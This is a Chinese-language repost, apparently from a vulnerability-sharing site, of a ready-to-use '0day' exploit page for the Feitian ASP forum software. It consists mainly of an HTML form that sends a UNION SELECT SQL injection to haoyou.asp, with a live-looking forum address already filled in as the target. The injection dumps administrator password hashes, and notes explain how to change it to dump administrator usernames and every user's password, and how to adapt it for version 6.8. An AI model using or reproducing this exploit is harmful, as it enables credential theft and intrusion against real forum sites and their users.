【白银时代】备注:不要乱来,今年抓的蛮严的……
Copy code<center><H1>飞天论坛asp版通杀 0day利用程序</H1></center><form method=post name="luoye">目标地址:<input name="act" type="text" id="act" size="140" value="http://bbs.0127.cn/"><br><br>注入语句:<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin"><br><br><input type=submit value=Fuck onClick="javascript:luoye.action=document.all.act.value+'haoyou.asp';"> <br><br><br><br><font color=red>爆所有管理员用户名时,把admin_pwd改为admin_user</font><br><br><font color=red>爆所有论坛用户数据时,把表名改为clubuser,用户名字段是clubuser_nickname;密码字段是clubuser_password</font><br><br><font color=red>如果想爆单一用户或管理员的数据,请自行加where语句,参考:id、clubuserid</font><br><br>
<font color=blue>以上是6.3版的注射语句,对于6.8版需要把字段数改为61,并且在字段前加自定义的字段头,默认为“ft_”</font><br><br>
本文来源于:漏洞公告。转载请保留这个链接,不会对你的SEO大业产生影响。
